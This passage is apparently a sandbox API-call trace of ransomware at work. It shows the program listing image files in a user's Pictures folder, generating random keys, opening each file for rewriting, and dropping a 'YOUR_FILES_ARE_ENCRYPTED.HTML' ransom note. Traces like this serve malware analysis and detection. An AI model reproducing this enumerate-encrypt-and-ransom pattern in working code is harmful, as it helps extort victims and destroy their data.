(in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="A6") returned 2 [0168.172] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="00") returned 2 [0168.172] lstrcpyW (in: lpString1=0x759262c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\DZm0D9mWkUWh0_9o4.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\DZm0D9mWkUWh0_9o4.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\DZm0D9mWkUWh0_9o4.gif" [0168.172] CreateIoCompletionPort (FileHandle=0x5d0, ExistingCompletionPort=0x3a0, CompletionKey=0x7582578, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.172] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7582578, lpOverlapped=0x7582578) returned 1 [0168.172] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88f5dc10, ftCreationTime.dwHighDateTime=0x1d7de46, ftLastAccessTime.dwLowDateTime=0x692c8460, ftLastAccessTime.dwHighDateTime=0x1d7e5b7, ftLastWriteTime.dwLowDateTime=0x692c8460, ftLastWriteTime.dwHighDateTime=0x1d7e5b7, nFileSizeHigh=0x0, nFileSizeLow=0x60c4, dwReserved0=0x0, dwReserved1=0x60, cFileName="lbEjiajxw4W.bmp", cAlternateFileName="LBEJIA~1.BMP")) returned 1 [0168.172] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\lbEjiajxw4W.bmp") returned 61 [0168.172] lstrcmpW (lpString1="lbEjiajxw4W.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.172] PathFindExtensionW (pszPath="lbEjiajxw4W.bmp") returned=".bmp" [0168.172] lstrlenW (lpString=".bmp") returned 4 [0168.172] PathFindExtensionW (pszPath="lbEjiajxw4W.bmp") returned=".bmp" [0168.172] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3526a9f0, ftCreationTime.dwHighDateTime=0x1d7e5fa, ftLastAccessTime.dwLowDateTime=0xb25a7480, ftLastAccessTime.dwHighDateTime=0x1d7e788, ftLastWriteTime.dwLowDateTime=0xb25a7480, ftLastWriteTime.dwHighDateTime=0x1d7e788, nFileSizeHigh=0x0, nFileSizeLow=0x15a41, dwReserved0=0x0, dwReserved1=0x60, cFileName="mVHSolkg25ErZnMeoaY9.jpg", cAlternateFileName="MVHSOL~1.JPG")) returned 1 [0168.172] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\mVHSolkg25ErZnMeoaY9.jpg") returned 70 [0168.172] lstrcmpW (lpString1="mVHSolkg25ErZnMeoaY9.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.172] PathFindExtensionW (pszPath="mVHSolkg25ErZnMeoaY9.jpg") returned=".jpg" [0168.173] lstrlenW (lpString=".jpg") returned 4 [0168.173] PathFindExtensionW (pszPath="mVHSolkg25ErZnMeoaY9.jpg") returned=".jpg" [0168.173] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\mVHSolkg25ErZnMeoaY9.jpg" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\mvhsolkg25erznmeoay9.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5cc [0168.173] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=88641) returned 1 [0168.173] GetProcessHeap () returned 0x270000 [0168.173] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75aa6d0 [0168.177] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="FA") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="D3") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="11") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="3C") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="82") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="AA") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="3C") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="65") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="B4") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="70") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="17") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="48") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="66") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="9F") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="AC") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="21") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="3E") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="39") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="F4") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="9B") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="34") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="E5") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="EC") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="3A") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="38") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="89") returned 2 [0168.178] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="8F") returned 2 [0168.178] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="26") returned 2 [0168.178] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="95") returned 2 [0168.178] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="32") returned 2 [0168.178] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="34") returned 2 [0168.178] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="06") returned 2 [0168.178] lstrcpyW (in: lpString1=0x75ba784, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\mVHSolkg25ErZnMeoaY9.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\mVHSolkg25ErZnMeoaY9.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\mVHSolkg25ErZnMeoaY9.jpg" [0168.178] CreateIoCompletionPort (FileHandle=0x5cc, ExistingCompletionPort=0x3a0, CompletionKey=0x75aa6d0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.178] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75aa6d0, lpOverlapped=0x75aa6d0) returned 1 [0168.178] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4538a80, ftCreationTime.dwHighDateTime=0x1d7e358, ftLastAccessTime.dwLowDateTime=0x1768660, ftLastAccessTime.dwHighDateTime=0x1d7e4d9, ftLastWriteTime.dwLowDateTime=0x1768660, ftLastWriteTime.dwHighDateTime=0x1d7e4d9, nFileSizeHigh=0x0, nFileSizeLow=0x1454a, dwReserved0=0x0, dwReserved1=0x60, cFileName="OEA6GlM0U9_7N3aR.gif", cAlternateFileName="OEA6GL~1.GIF")) returned 1 [0168.178] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\OEA6GlM0U9_7N3aR.gif") returned 66 [0168.178] lstrcmpW (lpString1="OEA6GlM0U9_7N3aR.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.178] PathFindExtensionW (pszPath="OEA6GlM0U9_7N3aR.gif") returned=".gif" [0168.178] lstrlenW (lpString=".gif") returned 4 [0168.178] PathFindExtensionW (pszPath="OEA6GlM0U9_7N3aR.gif") returned=".gif" [0168.179] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\OEA6GlM0U9_7N3aR.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\oea6glm0u9_7n3ar.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c8 [0168.179] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=83274) returned 1 [0168.179] GetProcessHeap () returned 0x270000 [0168.179] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76b8ef8 [0168.183] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="C6") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="B9") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="05") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="FC") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="90") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="50") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="EC") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="9D") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="6D") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="88") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="AB") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="05") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="08") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="41") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="37") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="DA") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="15") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="B3") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="D5") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="50") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="AB") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="6F") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="E8") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="0C") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="88") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="E9") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="10") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="A0") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="8B") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="8E") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="0C") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="44") returned 2 [0168.184] lstrcpyW (in: lpString1=0x76c8fac, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\OEA6GlM0U9_7N3aR.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\OEA6GlM0U9_7N3aR.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\OEA6GlM0U9_7N3aR.gif" [0168.185] CreateIoCompletionPort (FileHandle=0x5c8, ExistingCompletionPort=0x3a0, CompletionKey=0x76b8ef8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.185] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76b8ef8, lpOverlapped=0x76b8ef8) returned 1 [0168.185] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ee8f40, ftCreationTime.dwHighDateTime=0x1d7dc99, ftLastAccessTime.dwLowDateTime=0x1505ba70, ftLastAccessTime.dwHighDateTime=0x1d7e56a, ftLastWriteTime.dwLowDateTime=0x1505ba70, ftLastWriteTime.dwHighDateTime=0x1d7e56a, nFileSizeHigh=0x0, nFileSizeLow=0x10fa2, dwReserved0=0x0, dwReserved1=0x60, cFileName="Rla0Af.jpg", cAlternateFileName="")) returned 1 [0168.185] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\Rla0Af.jpg") returned 56 [0168.185] lstrcmpW (lpString1="Rla0Af.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.185] PathFindExtensionW (pszPath="Rla0Af.jpg") returned=".jpg" [0168.185] lstrlenW (lpString=".jpg") returned 4 [0168.185] PathFindExtensionW (pszPath="Rla0Af.jpg") returned=".jpg" [0168.185] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.185] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\Rla0Af.jpg" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\rla0af.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c4 [0168.185] GetFileSizeEx (in: hFile=0x5c4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=69538) returned 1 [0168.185] GetProcessHeap () returned 0x270000 [0168.186] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76e1050 [0168.189] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="80") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="3A") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="66") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="9F") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="3E") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="24") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="F0") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="EA") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="B1") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="69") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="57") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="AE") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="1B") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="8B") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="C3") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="1A") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="F2") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="FD") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="52") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="5A") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="2E") returned 2 [0168.190] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="93") returned 2 [0168.190] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="A6") returned 2 [0168.190] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="2E") returned 2 [0168.190] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="7F") returned 2 [0168.190] lstrcpyW (in: lpString1=0x76f1104, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\Rla0Af.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\Rla0Af.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\Rla0Af.jpg" [0168.190] CreateIoCompletionPort (FileHandle=0x5c4, ExistingCompletionPort=0x3a0, CompletionKey=0x76e1050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.190] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76e1050, lpOverlapped=0x76e1050) returned 1 [0168.190] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76d55e50, ftCreationTime.dwHighDateTime=0x1d7de25, ftLastAccessTime.dwLowDateTime=0xdff9d980, ftLastAccessTime.dwHighDateTime=0x1d7de8c, ftLastWriteTime.dwLowDateTime=0xdff9d980, ftLastWriteTime.dwHighDateTime=0x1d7de8c, nFileSizeHigh=0x0, nFileSizeLow=0x17537, dwReserved0=0x0, dwReserved1=0x60, cFileName="zgyTqIKo7R9.gif", cAlternateFileName="ZGYTQI~1.GIF")) returned 1 [0168.190] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zgyTqIKo7R9.gif") returned 61 [0168.190] lstrcmpW (lpString1="zgyTqIKo7R9.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0168.190] PathFindExtensionW (pszPath="zgyTqIKo7R9.gif") returned=".gif" [0168.190] lstrlenW (lpString=".gif") returned 4 [0168.190] PathFindExtensionW (pszPath="zgyTqIKo7R9.gif") returned=".gif" [0168.191] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zgyTqIKo7R9.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\zgytqiko7r9.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0168.191] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=95543) returned 1 [0168.191] GetProcessHeap () returned 0x270000 [0168.191] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x77091a8 [0168.195] lstrcpyW (in: lpString1=0x771925c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zgyTqIKo7R9.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zgyTqIKo7R9.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zgyTqIKo7R9.gif" [0168.195] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x77091a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.195] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x77091a8, lpOverlapped=0x77091a8) returned 1 [0168.195] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d623f90, ftCreationTime.dwHighDateTime=0x1d7dc39, ftLastAccessTime.dwLowDateTime=0xfaa8aab0, ftLastAccessTime.dwHighDateTime=0x1d7e632, ftLastWriteTime.dwLowDateTime=0xfaa8aab0, ftLastWriteTime.dwHighDateTime=0x1d7e632, nFileSizeHigh=0x0, nFileSizeLow=0x11ce4, dwReserved0=0x0, dwReserved1=0x60, cFileName="zpD0p 1em-JOVM.gif", cAlternateFileName="ZPD0P1~1.GIF")) returned 1 [0168.195] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zpD0p 1em-JOVM.gif") returned 64 [0168.195] lstrcmpW (lpString1="zpD0p 1em-JOVM.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0168.195] PathFindExtensionW (pszPath="zpD0p 1em-JOVM.gif") returned=".gif" [0168.195] lstrlenW (lpString=".gif") returned 4 [0168.195] PathFindExtensionW (pszPath="zpD0p 1em-JOVM.gif") returned=".gif" [0168.195] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.195] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zpD0p 1em-JOVM.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\zpd0p 1em-jovm.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0168.196] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=72932) returned 1 [0168.196] GetProcessHeap () returned 0x270000 [0168.196] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7731300 [0168.200] lstrcpyW (in: lpString1=0x77413b4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zpD0p 1em-JOVM.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zpD0p 1em-JOVM.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zpD0p 1em-JOVM.gif" [0168.200] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7731300, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.200] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7731300, lpOverlapped=0x7731300) returned 1 [0168.200] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d623f90, ftCreationTime.dwHighDateTime=0x1d7dc39, ftLastAccessTime.dwLowDateTime=0xfaa8aab0, ftLastAccessTime.dwHighDateTime=0x1d7e632, ftLastWriteTime.dwLowDateTime=0xfaa8aab0, ftLastWriteTime.dwHighDateTime=0x1d7e632, nFileSizeHigh=0x0, nFileSizeLow=0x11ce4, dwReserved0=0x0, dwReserved1=0x60, cFileName="zpD0p 1em-JOVM.gif", cAlternateFileName="ZPD0P1~1.GIF")) returned 0 [0168.200] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0168.200] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0168.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0168.201] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0168.203] CloseHandle (hObject=0x4a8) returned 1 [0168.203] GetProcessHeap () returned 0x270000 [0168.205] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76302f8 | out: hHeap=0x270000) returned 1 [0168.205] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71fb2ce0, ftCreationTime.dwHighDateTime=0x1d7de2d, ftLastAccessTime.dwLowDateTime=0x52c55ff0, ftLastAccessTime.dwHighDateTime=0x1d7df7a, ftLastWriteTime.dwLowDateTime=0x52c55ff0, ftLastWriteTime.dwHighDateTime=0x1d7df7a, nFileSizeHigh=0x0, nFileSizeLow=0x16a7d, dwReserved0=0xb916d8, dwReserved1=0x0, cFileName="7g14lH7VgBRylj.gif", cAlternateFileName="7G14LH~1.GIF")) returned 1 [0168.205] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\7g14lH7VgBRylj.gif") returned 59 [0168.205] lstrcmpW (lpString1="7g14lH7VgBRylj.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.205] PathFindExtensionW (pszPath="7g14lH7VgBRylj.gif") returned=".gif" [0168.205] lstrlenW (lpString=".gif") returned 4 [0168.205] PathFindExtensionW 